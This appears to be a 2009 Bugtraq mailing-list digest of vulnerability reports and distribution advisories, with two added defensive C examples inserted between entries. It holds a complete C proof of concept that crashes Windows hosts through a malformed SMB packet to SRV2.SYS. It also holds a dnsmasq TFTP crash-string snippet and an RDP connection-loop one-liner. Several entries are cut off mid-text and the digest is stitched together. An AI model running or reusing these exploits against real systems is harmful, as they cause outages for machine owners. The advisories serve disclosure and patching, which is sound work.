RE: Re: Multiple RDP Connections BSOD DOS
Cannot reproduce, either, XP SP3. Maybe you were really low on RAM?

-----Original Message-----
From: nob...@nowhere.com [mailto:nob...@nowhere.com]
Sent: Wednesday, September 09, 2009 3:29 PM
To: bugtraq@securityfocus.com
Subject: Re: Re: Multiple RDP Connections BSOD DOS

Cannot reproduce. Windows XP SP2
Re: Multiple RDP Connections BSOD DOS
Unable to reproduce on Vista Ultimate x64-all patch levels.

John Menerick
www.securesql.info

On Sep 8, 2009, at 11:35 AM, Tim Medin wrote:

> Creating multiple RDP connections at the same time causes Windows to Blue Screen.
> Here is the Proof of Concept code.
>
> for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
>
> It does work on Windows 7 and some Vista installations.
>
> -Tim Medin
Re: Re: Multiple RDP Connections BSOD DOS
Cannot reproduce. Windows XP SP2
RE: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
b...@home.com wrote:
> Does anyone have a reference pointing to the original announcement on
> here for these vulnerabilities? I would like to research them
> regarding the potential continued vulnerability of XP, since MS did
> not provide a patch for XP products.

CERT-FI was the coordinator for these vulnerabilities, and the CERT-FI advisory (referenced in the previous message from Juha-Matti Laurio) is the best overall announcement.

Jim
--
James N. Duncan, CISSP
Manager, Juniper Networks Security Incident Response Team (Juniper SIRT)
E-mail: jdun...@juniper.net
Mobile: +1 919 608 0748
PGP key fingerprint: E09E EA55 DA28 1399 75EB D6A2 7092 9A9C 6DC3 1821
Re: Multiple RDP Connections BSOD DOS
I could not reproduce this on Vista Home Premium or Windows 7 Ultimate (different computers, both 64-bit) even with creating 200 connections. Could you provide more information on your setup?

Tim Medin wrote:
> Creating multiple RDP connections at the same time causes Windows to Blue Screen.
> Here is the Proof of Concept code.
>
> for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
>
> It does work on Windows 7 and some Vista installations.
>
> -Tim Medin
[ MDVSA-2009:226 ] aria2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:226
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : aria2
 Date    : September 9, 2009
 Affected: 2009.0, 2009.1, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been found and corrected in aria2:

 aria2 has a buffer overflow which makes it crash at least on mips.

 This update provides a solution to this vulnerability.
 _______________________________________________________________________

 References:

 https://qa.mandriva.com/52840
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKp7sWmqjQ0CJFipgRAnWVAJ9NTr/fWkV54mK2oW+YPvIP9cL3ZwCcCDm9
LSL0lhYX2+XU0QijJNzojuo=
=SGvN
-----END PGP SIGNATURE-----
CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

1. *Advisory Information*

Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958

3. *Vulnerability Description*

Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability has been found that may allow an attacker to execute arbitrary code on servers or home routers running dnsmasq [1] with the TFTP service [2][3] enabled ('--enable-tftp'). This service is not enabled by default on most distributions; in particular it is not enabled by default on OpenWRT or DD-WRT. Chances of successful exploitation increase when a long directory prefix is used for TFTP. Code will be executed with the privileges of the user running dnsmasq, which is normally a non-privileged one.

Additionally there is a potential DoS attack on the TFTP service by exploiting a null-pointer dereference vulnerability.

4. *Vulnerable packages*

. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.

5. *Non-vulnerable packages*

. dnsmasq 2.50

6. *Vendor Information, Solutions and Workarounds*

If the TFTP service is enabled and patching is not available immediately, a valid workaround is to filter TFTP for untrusted hosts in the network (such as the Internet). This is the default configuration when enabling TFTP on most home routers.

Patches are already available from the software author. Most distributions should release updates for binary packages soon.

7. *Credits*

The heap-overflow vulnerability (CVE-2009-2957) was discovered during Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los Herederos de Don Pablo" of Core Security Technologies. The null-pointer dereference (CVE-2009-2958) was reported to the author of dnsmasq independently by an uncredited code auditor. It was merged with this advisory for users' convenience.

8. *Technical Description*

8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*

First let's focus on the overflow vulnerability. The 'tftp_request' calls 'strncat' on 'daemon->namebuff', which has a predefined size of 'MAXDNAME' bytes (defaulting to 1025).

/-----
  else if (filename[0] == '/')
    daemon->namebuff[0] = 0;
  strncat(daemon->namebuff, filename, MAXDNAME);
- -----/

This may cause a heap overflow because 'daemon->namebuff' may already contain data, namely the configured 'daemon->tftp_prefix' passed to the daemon via a configuration file.

/-----
  if (daemon->tftp_prefix)
    {
      if (daemon->tftp_prefix[0] == '/')
        daemon->namebuff[0] = 0;
      strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME);
- -----/

The default prefix is '/var/tftpd', but if a longer prefix is used, arbitrary code execution may be possible. Sending the string resulting from the execution of the following python snippet to a vulnerable server, with a long enough directory prefix configured, should crash the daemon.

/-----
import sys
sys.stdout.write('\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00')
- -----/

8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*

Now onto the null-pointer dereference. The user can crash the service by handcrafting a packet, because of a problem in the guard of the first if inside this code loop:

/-----
  while ((opt = next(&p, end)))
    {
      if (strcasecmp(opt, "blksize") == 0 &&
          (opt = next(&p, end)) &&
          !(daemon->options & OPT_TFTP_NOBLOCK))
        {
          transfer->blocksize = atoi(opt);
          if (transfer->blocksize < 1)
            transfer->blocksize = 1;
          if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
            transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
          transfer->opt_blocksize = 1;
          transfer->block = 0;
        }

      if (strcasecmp(opt, "tsize") == 0 && next(&p, end) && !transfer->netascii)
        {
          transfer->opt_transize = 1;
          transfer->block = 0;
        }
    }
- -----/

The problem exists because the guard of the first if includes the result of 'opt = next(&p, end)' as part of the check. If this returns 'NULL', the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will dereference the null-pointer.

9. *Report Timeline*

. 2009-08-20: Core Security Technologies no
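As an added illustration of the two defects described in section 8 (this is not code from the advisory, from dnsmasq, or the upstream 2.50 fix), the C below replaces the two unbounded strncat() calls with a length-checked join and rewrites the option loop so that strcasecmp() can never be reached with a NULL pointer. The next() helper, the transfer struct, PACKET_BUFF_SZ and the demo_* functions are stand-ins assumed for this example, and the option lists are constructed test input.

```c
#define _DEFAULT_SOURCE
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAXDNAME 1025        /* namebuff size quoted in the advisory */
#define PACKET_BUFF_SZ 2048  /* assumed stand-in for daemon->packet_buff_sz */

/* Assumed stand-in for the transfer state the quoted loop updates. */
struct transfer { int blocksize, opt_blocksize, opt_transize, netascii; unsigned block; };

/* Stand-in for the next() helper the quoted loop relies on (assumed behaviour):
 * returns the next NUL-terminated string in [*p, end) and advances *p past it,
 * or NULL when no complete string remains. */
static char *next(char **p, const char *end)
{
    char *s = *p, *nul;
    if (s >= end || !(nul = memchr(s, '\0', (size_t)(end - s))))
        return NULL;
    *p = nul + 1;
    return s;
}

/* Bounded replacement for the two strncat(..., MAXDNAME) calls, each of which
 * allowed MAXDNAME bytes into a buffer of only MAXDNAME bytes, so prefix +
 * filename could run past the end. Returns 0, or -1 if the path will not fit. */
int build_tftp_path(char *namebuff, size_t bufsz,
                    const char *prefix, const char *filename)
{
    size_t plen = prefix ? strlen(prefix) : 0;
    size_t flen = strlen(filename);
    if (filename[0] == '/')   /* an absolute name replaces the prefix, as before */
        plen = 0;
    if (plen + flen + 1 > bufsz)
        return -1;
    if (plen)
        memcpy(namebuff, prefix, plen);
    memcpy(namebuff + plen, filename, flen + 1);
    return 0;
}

/* Option loop with the NULL path closed. The quoted loop stored the option
 * value back into 'opt' inside the first guard, so "blksize" with no value
 * left opt == NULL for the following strcasecmp(opt, "tsize"). Here name and
 * value are read as a pair and a missing value is an error (-1), not a crash. */
int parse_tftp_options(char *p, char *end, struct transfer *t, int noblock)
{
    char *opt, *val;
    while ((opt = next(&p, end))) {
        if (!(val = next(&p, end)))
            return -1;
        if (strcasecmp(opt, "blksize") == 0 && !noblock) {
            t->blocksize = atoi(val);
            if (t->blocksize < 1)
                t->blocksize = 1;
            if (t->blocksize > PACKET_BUFF_SZ - 4)
                t->blocksize = PACKET_BUFF_SZ - 4;
            t->opt_blocksize = 1;
            t->block = 0;
        } else if (strcasecmp(opt, "tsize") == 0 && !t->netascii) {
            t->opt_transize = 1;
            t->block = 0;
        }   /* unknown options are skipped together with their value */
    }
    return 0;
}

/* Constructed option lists, as they follow the mode string in a request. */
static const char good_opts[] = "blksize\0" "1432\0" "tsize\0" "0";
static const char bad_opts[]  = "blksize";  /* name with no value: the crash case */

/* Returns the negotiated block size (1432) for the well-formed list. */
int demo_wellformed(void)
{
    char buf[sizeof good_opts];
    struct transfer t = {0};
    memcpy(buf, good_opts, sizeof buf);   /* the implicit final NUL ends "0" */
    if (parse_tftp_options(buf, buf + sizeof buf, &t, 0) != 0)
        return -1;
    return (t.opt_blocksize && t.opt_transize) ? t.blocksize : -1;
}

/* Returns -1 (malformed) for the list that crashed the original loop. */
int demo_malformed(void)
{
    char buf[sizeof bad_opts];
    struct transfer t = {0};
    memcpy(buf, bad_opts, sizeof buf);
    return parse_tftp_options(buf, buf + sizeof buf, &t, 0);
}

/* Joins "/var/tftpd/" with a name of name_len 'A's: 0 when it fits, -1 when
 * not. name_len 1535 mirrors the PoC string quoted in the advisory. */
int demo_path(size_t name_len)
{
    char namebuff[MAXDNAME], name[2048];
    if (name_len >= sizeof name)
        return -1;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    return build_tftp_path(namebuff, sizeof namebuff, "/var/tftpd/", name);
}
```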
SMB SRV2.SYS Denial of Service PoC
/*
 *
 * SMB SRV2.SYS Denial of Service PoC
 * Release Date: Sep 8, 2009
 * Severity: Medium/High
 * Systems Affected: Windows Vista SP1+SP2, Windows 2008 SP2, Windows 7 Beta + RC
 * Discovered by: Laurent Gaffié
 *
 * Description:
 * SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
 * The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB server, and it's used
 * to identify the SMB dialect that will be used for further communication.
 *
 * KB: http://www.microsoft.com/technet/security/advisory/975497.mspx
 */

/* The header names were lost in extraction; the Winsock and stdio headers
 * this code needs are restored here, and string.h is added for memset(). */
#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "WS2_32.lib")

char buff[] =
    "\x00\x00\x00\x90"  // Begin SMB header: Session message
    "\xff\x53\x4d\x42"  // Server Component: SMB
    "\x72\x00\x00\x00"  // Negotiate Protocol
    "\x00\x18\x53\xc8"  // Operation 0x18 & sub 0xc853
    "\x00\x26"          // Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00";

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Syntax: %s [ip address]\r\n", argv[0]);
        return -1;
    }

    WSADATA WSAdata;
    WSAStartup(MAKEWORD(2, 2), &WSAdata);

    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    char *host = argv[1];

    // fill in sockaddr and resolve the host
    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = htons((unsigned short)445);
    ssin.sin_addr.s_addr = inet_addr(host);

    printf("Connecting to %s:445... ", host);
    if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
        printf("ERROR!\r\n");
        return 0;
    }
    printf("OK\r\n");

    printf("Sending malformed packet... ");
    if (send(sock, buff, sizeof(buff), 0) <= 0) {
        printf("ERROR!\r\n");
        return 0;
    }
    printf("OK\r\n");
    printf("Successfully sent packet!\r\nTarget should be crashed...\r\n");

    // Close the socket
    closesocket(sock);
    WSACleanup();
    return 1;
}
[SECURITY] [DSA 1882-1] New xapian-omega packages fix cross-site scripting
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1882-1                  secur...@debian.org
http://www.debian.org/security/                               Nico Golde
September 9th, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xapian-omega
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-2947

It was discovered that xapian-omega, a CGI interface for searching xapian databases, is not properly escaping user supplied input when printing exceptions. An attacker can use this to conduct cross-site scripting attacks via crafted search queries resulting in an exception and steal potentially sensitive data from web applications running on the same domain or embedding the search engine into a website.

For the oldstable distribution (etch), this problem has been fixed in version 0.9.9-1+etch1.

For the stable distribution (lenny), this problem has been fixed in version 1.0.7-3+lenny1.

For the testing (squeeze) and unstable (sid) distribution, this problem will be fixed soon.

We recommend that you upgrade your xapian-omega packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/mai
[ GLSA 200909-11 ] GCC-XML: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GCC-XML: Insecure temporary file usage
      Date: September 09, 2009
      Bugs: #245765
        ID: 200909-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in GCC-XML allowing for symlink attacks.

Background
==========

GCC-XML is an XML output extension to the C++ front-end of GCC.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  dev-cpp/gccxml    < 0.9.0_pre20090516       >= 0.9.0_pre20090516

Description
===========

Dmitry E. Oboukhov reported that find_flags in GCC-XML does not handle "/tmp/*.cxx" temporary files securely.

Impact
======

A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GCC-XML users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =dev-cpp/gccxml-0.9.0_pre20090516

References
==========

  [ 1 ] CVE-2008-4957
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4957

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200909-10 ] LMBench: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: LMBench: Insecure temporary file usage
      Date: September 09, 2009
      Bugs: #246015
        ID: 200909-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple insecure temporary file usage issues have been reported in LMBench, allowing for symlink attacks.

Background
==========

LMBench is a suite of simple, portable benchmarks for UNIX platforms.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  app-benchmarks/lmbench          <= 3                    Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===========

Dmitry E. Oboukhov reported that the rccs and STUFF scripts do not handle "/tmp/sdiff.#" temporary files securely.

NOTE: There might be further occurrences of insecure temporary file usage.

Impact
======

A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

LMBench has been removed from Portage. We recommend that users unmerge LMBench:

    # emerge --unmerge app-benchmarks/lmbench

References
==========

  [ 1 ] CVE-2008-4968
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4968

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200909-09 ] Screenie: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Screenie: Insecure temporary file usage
      Date: September 09, 2009
      Bugs: #250476
        ID: 200909-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in Screenie, allowing for symlink attacks.

Background
==========

Screenie is a small screen frontend that is designed to be a session handler.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  app-misc/screenie             < 1.30.0-r1             >= 1.30.0-r1

Description
===========

Dmitry E. Oboukhov reported that Screenie does not handle "/tmp/.screenie.#" temporary files securely.

Impact
======

A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Screenie users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =app-misc/screenie-1.30.0-r1

References
==========

  [ 1 ] CVE-2008-5371
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5371

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200909-08 ] C* music player: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: C* music player: Insecure temporary file usage
      Date: September 09, 2009
      Bugs: #250474
        ID: 200909-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in the C* music player, allowing for symlink attacks.

Background
==========

The C* Music Player (cmus) is a modular and very configurable ncurses-based audio player.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-sound/cmus               < 2.2.0-r1               >= 2.2.0-r1

Description
===========

Dmitry E. Oboukhov reported that cmus-status-display does not handle the "/tmp/cmus-status" temporary file securely.

Impact
======

A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All C* music player users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =media-sound/cmus-2.2.0-r1

References
==========

  [ 1 ] CVE-2008-5375
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5375

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Re: MS09-048 includes fixes for TCP/IP implementation issues reported more than a year ago
Does anyone have a reference pointing to the original announcement on here for these vulnerabilities? I would like to research them regarding the potential continued vulnerability of XP, since MS did not provide a patch for XP products.
[ GLSA 200909-07 ] TkMan: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: TkMan: Insecure temporary file usage
      Date: September 09, 2009
      Bugs: #247540
        ID: 200909-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An insecure temporary file usage has been reported in TkMan, allowing for symlink attacks.

Background
==========

TkMan is a graphical, hypertext manual page and Texinfo browser for UNIX.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  app-text/tkman                   < 2.2-r1                 >= 2.2-r1

Description
===========

Dmitry E. Oboukhov reported that TkMan does not handle the "/tmp/tkman#" and "/tmp/ll" temporary files securely.

Impact
======

A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TkMan users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =app-text/tkman-2.2-r1

References
==========

  [ 1 ] CVE-2008-5137
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5137

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
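GLSA 200909-07 through 200909-11 above all describe one defect class: a fixed, predictable name under /tmp is opened for writing, so a local user who plants a symlink there gets the link target overwritten with the victim's privileges. As an added example (not code from Gentoo or from any of the packages named), the C below contrasts that naive fopen() pattern with a mkstemp()-then-rename() rewrite, which replaces a planted link instead of following it, and plays both out inside a private scratch directory that stands in for /tmp. The file names and demo_symlink_defence() are constructed for this example.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The pattern the GLSAs describe: a fixed, predictable name opened for
 * writing. If another local user has planted a symlink at that name,
 * fopen() follows it and the link target is overwritten. */
int write_file_naively(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (!f)
        return -1;
    fputs(data, f);
    return fclose(f);
}

/* Safe rewrite of a fixed name inside dir: write to a mkstemp()-created file
 * (O_CREAT|O_EXCL, mode 0600) in the same directory, then rename() it over
 * the final name. rename() replaces a planted symlink rather than following
 * it, so the link target is never touched. Returns 0, or -1 with errno set. */
int write_file_atomically(const char *dir, const char *name, const char *data)
{
    char tmp[PATH_MAX], final[PATH_MAX];
    if (snprintf(tmp, sizeof tmp, "%s/.%s.XXXXXX", dir, name) >= (int)sizeof tmp
        || snprintf(final, sizeof final, "%s/%s", dir, name) >= (int)sizeof final) {
        errno = ENAMETOOLONG;
        return -1;
    }
    int fd = mkstemp(tmp);
    if (fd < 0)
        return -1;
    size_t len = strlen(data);
    int ok = write(fd, data, len) == (ssize_t)len && fsync(fd) == 0;
    ok = (close(fd) == 0) && ok;
    if (!ok || rename(tmp, final) != 0) {
        int saved = errno;
        unlink(tmp);
        errno = saved;
        return -1;
    }
    return 0;
}

/* Reads the file and compares it with the expected contents. */
static int file_has(const char *path, const char *expect)
{
    char buf[64] = {0};
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return strcmp(buf, expect) == 0;
}

/* Plays the scenario in a private scratch directory standing in for /tmp:
 * "victim" holds data the user cares about and "status" is the predictable
 * name, replaced by a symlink to victim. Returns a bit mask: bit 0 set if
 * the naive writer clobbered victim, bit 1 set if the atomic writer left
 * victim intact and produced a regular "status" file. Expected: 3. */
int demo_symlink_defence(void)
{
    char dir[PATH_MAX], victim[PATH_MAX], status[PATH_MAX];
    int result = 0;
    strcpy(dir, "/tmp/tmpfile-demo-XXXXXX");
    if (!mkdtemp(dir)) {               /* fall back to the working directory */
        strcpy(dir, "./tmpfile-demo-XXXXXX");
        if (!mkdtemp(dir))
            return -1;
    }
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(status, sizeof status, "%s/status", dir);

    /* 1. predictable name + planted symlink: the naive writer follows it */
    write_file_naively(victim, "original\n");
    if (symlink(victim, status) == 0
        && write_file_naively(status, "clobbered\n") == 0
        && file_has(victim, "clobbered\n"))
        result |= 1;

    /* 2. same planted symlink, atomic writer: victim keeps its contents */
    write_file_naively(victim, "original\n");
    if (write_file_atomically(dir, "status", "clobbered\n") == 0
        && file_has(victim, "original\n")
        && file_has(status, "clobbered\n"))
        result |= 2;

    unlink(status);
    unlink(victim);
    rmdir(dir);
    return result;
}
```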
[ GLSA 200909-06 ] aMule: Parameter injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200909-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: aMule: Parameter injection
      Date: September 09, 2009
      Bugs: #268163
